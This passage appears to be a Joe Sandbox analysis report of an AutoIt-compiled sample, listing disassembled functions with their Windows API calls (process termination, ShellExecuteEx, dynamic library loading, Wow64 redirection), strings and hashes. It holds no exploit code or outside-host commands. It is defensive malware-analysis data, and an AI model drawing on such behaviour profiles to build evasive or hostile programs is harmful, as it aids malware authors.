                                        • Opcode Fuzzy Hash: 96c4ed3f3f94ac45f9426ead42067a7d7e6d28522fd7f720fbbca96498407fcc
                                        • Instruction Fuzzy Hash: EC11C976000109FFDB129F95DC88FAE7F6DEB08394F048022FA199A1A1C771AE55DBA4
                                        Function 00C551FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00C55218
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C55229
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C55230
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C55238
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C5524F
                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C55261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 8dc008ac909971109c15bb524690199857be403a1d7b5fd3e0bdbe71b1b068fe
                                        • Instruction ID: f4e510f2c492127cfda337d3160988a6531759cdc84b769abaa893f9c6a09b5a
                                        • Opcode Fuzzy Hash: 8dc008ac909971109c15bb524690199857be403a1d7b5fd3e0bdbe71b1b068fe
                                        • Instruction Fuzzy Hash: A4014F75A00718BBEB109BF59C89B5EBFB8EF48752F044065FA04E7281DA709904CBA4
                                        Function 00BF1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF1BF4
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF1BFC
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF1C07
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF1C12
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF1C1A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF1C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: 03baba44285b8925d4ac35e9cd33172a038bc58cf2ae8ea69683035f13e4ce90
                                        • Instruction ID: 93ccffc0e13adcc2b367d42dfc31c4d7ab587cbce91fcb5d4d0630228810be01
                                        • Opcode Fuzzy Hash: 03baba44285b8925d4ac35e9cd33172a038bc58cf2ae8ea69683035f13e4ce90
                                        • Instruction Fuzzy Hash: 4C016CB09027597DE3008F5A8C85B56FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                        Function 00C5EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C5EB30
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C5EB46
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00C5EB55
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5EB64
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5EB6E
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5EB75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: 606cdf48fa8d1d466e00f195c05dd4221d2a242b61992f4a513cfdce98cd63b0
                                        • Instruction ID: 48a12cdbf6f833b4c810d0891ec73d507e7c02cf5ad2ec937a15d079457c157d
                                        • Opcode Fuzzy Hash: 606cdf48fa8d1d466e00f195c05dd4221d2a242b61992f4a513cfdce98cd63b0
                                        • Instruction Fuzzy Hash: 69F03A72240158BBE7215B629C8EFEF3A7CEFCAB11F000168FA11E1091E7B05A01C7B9
                                        Function 00C47439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?), ref: 00C47452
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C47469
                                        • GetWindowDC.USER32(?), ref: 00C47475
                                        • GetPixel.GDI32(00000000,?,?), ref: 00C47484
                                        • ReleaseDC.USER32(?,00000000), ref: 00C47496
                                        • GetSysColor.USER32(00000005), ref: 00C474B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: 34fcbfeeaa4ee8ab26c8984d778c394712bfd795031d2007afb54cf2aa621690
                                        • Instruction ID: 354aa0f5b995727fed605ef0ddb848ecada147e40b9dd5722c7688b058a51409
                                        • Opcode Fuzzy Hash: 34fcbfeeaa4ee8ab26c8984d778c394712bfd795031d2007afb54cf2aa621690
                                        • Instruction Fuzzy Hash: EA014631400215EFEB519FA4EC48BAE7BB6FF04321F654264F926A21A1CB352E51EF64
                                        Function 00C51874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5187F
                                        • UnloadUserProfile.USERENV(?,?), ref: 00C5188B
                                        • CloseHandle.KERNEL32(?), ref: 00C51894
                                        • CloseHandle.KERNEL32(?), ref: 00C5189C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C518A5
                                        • HeapFree.KERNEL32(00000000), ref: 00C518AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: c816b691e9cad810107a6491641ae7398a865aeec225480ceba80553d49eec6c
                                        • Instruction ID: c08f70ce429b57cf107b599b26af67f790c8d01de5eda6a4466da5269f164ead
                                        • Opcode Fuzzy Hash: c816b691e9cad810107a6491641ae7398a865aeec225480ceba80553d49eec6c
                                        • Instruction Fuzzy Hash: 4AE0C236004101BBDA015BA1ED8CF4EBB29FB4AB22B108220F22581474CB329821EB68
                                        Function 00C5C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5C6EE
                                        • _wcslen.LIBCMT ref: 00C5C735
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C5C79C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C5C7CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: 114fe056461148fdd7bb516569c17882b0aa830673c52177b6d2e7217fc91683
                                        • Instruction ID: 22b3a592495b4174e1bf7e61a9ccddbfeb3e3ef887945845c7ae91170bc3d101
                                        • Opcode Fuzzy Hash: 114fe056461148fdd7bb516569c17882b0aa830673c52177b6d2e7217fc91683
                                        • Instruction Fuzzy Hash: 5851EF796043009FC7109E28C8C4B6A77E8AB49391F040A2DFDA5D35D1DB70DA88DB9A
                                        Function 00C7AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00C7AEA3
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                        • GetProcessId.KERNEL32(00000000), ref: 00C7AF38
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7AF67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                        • String ID: <$@
                                        • API String ID: 146682121-1426351568
                                        • Opcode ID: f0d74349ccd005ba824694084c8898dd981161cba783de0c8c25993597277b5b
                                        • Instruction ID: 10ede9cc81e9fcb2467b77928a9252a53e58b85c56d8d86784f87983a9988a4b
                                        • Opcode Fuzzy Hash: f0d74349ccd005ba824694084c8898dd981161cba783de0c8c25993597277b5b
                                        • Instruction Fuzzy Hash: 64716175A00619DFCB14DF54C495A9EBBF0FF48314F048499E81AAB361CB74ED45CB91
                                        Function 00C5719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C57206
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C5723C
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C5724D
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C572CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: 1adc2a002b4e294180ff11d97d356462ee340cfd1f98bf24fa9265adc256e657
                                        • Instruction ID: a2868c564587c0d9233fd791a826679bf2a4bb205b894d70e62c8cedf3584b1b
                                        • Opcode Fuzzy Hash: 1adc2a002b4e294180ff11d97d356462ee340cfd1f98bf24fa9265adc256e657
                                        • Instruction Fuzzy Hash: 2C416EB5604204EFDB15CF54DC88B9A7BA9EF44311F1481A9BD059F20AD7B0DAC9CBA4
                                        Function 00C83D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C83E35
                                        • IsMenu.USER32(?), ref: 00C83E4A
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C83E92
                                        • DrawMenuBar.USER32 ref: 00C83EA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: 444ec26e78230d7aaf2b8698512a7fde3248854a03e7392710314c1bfae8d485
                                        • Instruction ID: 0d47ab1bafbeebac2d11fff39345a3cd82e097d57fa6d56e3f24e3a6bb822939
                                        • Opcode Fuzzy Hash: 444ec26e78230d7aaf2b8698512a7fde3248854a03e7392710314c1bfae8d485
                                        • Instruction Fuzzy Hash: B0416775A00249AFDF10EF50D884EAABBB9FF4A768F044029E915A7250D730AE44DF64
                                        Function 00C51DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C51E66
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C51E79
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C51EA9
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2081771294-1403004172
                                        • Opcode ID: 5982d3363973c2817e5b4dbcf014ea9c6b18ea1de79f868f4bfeb164cd2822c7
                                        • Instruction ID: d7271e9efdfe3dea41070c758eb33437fe9a3d29581472caa55918b14c93e740
                                        • Opcode Fuzzy Hash: 5982d3363973c2817e5b4dbcf014ea9c6b18ea1de79f868f4bfeb164cd2822c7
                                        • Instruction Fuzzy Hash: D4213775A00108BADB14AB61CC8EEFFB7B9DF41390B144129FD21A31E1DB744E8ED624
                                        Function 00C82F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C82F8D
                                        • LoadLibraryW.KERNEL32(?), ref: 00C82F94
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C82FA9
                                        • DestroyWindow.USER32(?), ref: 00C82FB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: 79d344b8dbf07bc7577c897dbd80bdc2d0535191d6cb7ccb587e417e35c464e0
                                        • Instruction ID: 4637bcc4d9f9e0f84196d9b095fccbe0789c67cae69d46958c1786fddd724b55
                                        • Opcode Fuzzy Hash: 79d344b8dbf07bc7577c897dbd80bdc2d0535191d6cb7ccb587e417e35c464e0
                                        • Instruction Fuzzy Hash: 66219A71204229BBEB106FA4DC88FBB37B9EF59368F110228FA60D2190D771DC51D768
                                        Function 00C14D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C14D1E,00C228E9,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002), ref: 00C14D8D
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C14DA0
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00C14D1E,00C228E9,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002,00000000), ref: 00C14DC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 4a1e0975a038227cf98bc39f6bef955adc7fbad5d287ac2e26a35d48179df594
                                        • Instruction ID: 699e0c864405d54c557e5dd76fe9b659dfb6cd8923999bba2da7b6f09130798b
                                        • Opcode Fuzzy Hash: 4a1e0975a038227cf98bc39f6bef955adc7fbad5d287ac2e26a35d48179df594
                                        • Instruction Fuzzy Hash: 3CF04435540208BBDF159F90EC89BDDBBB5EF45752F100164F905A2160CB705A94DB95
                                        Function 00BF4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E9C
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF4EAE
                                        • FreeLibrary.KERNEL32(00000000,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: ea9438a270d0f0f7b470fea1bd82f66c486c7b2f8010e28eb52ac22f394ed94c
                                        • Instruction ID: 126909c2165adbd42eb13e27b16ca5510cace7b55b641b31b40b887a3a6cabad
                                        • Opcode Fuzzy Hash: ea9438a270d0f0f7b470fea1bd82f66c486c7b2f8010e28eb52ac22f394ed94c
                                        • Instruction Fuzzy Hash: 2AE0CD36A015225BD3321B257C9CB7F7594EF81F62B050165FE00D3200DB70CD0982B4
                                        Function 00BF4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E62
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF4E74
                                        • FreeLibrary.KERNEL32(00000000,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: c55dabae7e122cbadb5eee54dd76287f6c560ad5bad01ad7637a2a1166338c8f
                                        • Instruction ID: c3fe647c7b3af3b695b7bcf8e55327e96190e2d671add8d085425de4cb120c51
                                        • Opcode Fuzzy Hash: c55dabae7e122cbadb5eee54dd76287f6c560ad5bad01ad7637a2a1166338c8f
                                        • Instruction Fuzzy Hash: B8D0C232502A215747321B247C8CFAF2A58EF81F113050260BA00A3110CF30CD0A83F8
                                        Function 00C7A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00C7A427
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C7A435
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C7A468
                                        • CloseHandle.KERNEL32(?), ref: 00C7A63D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
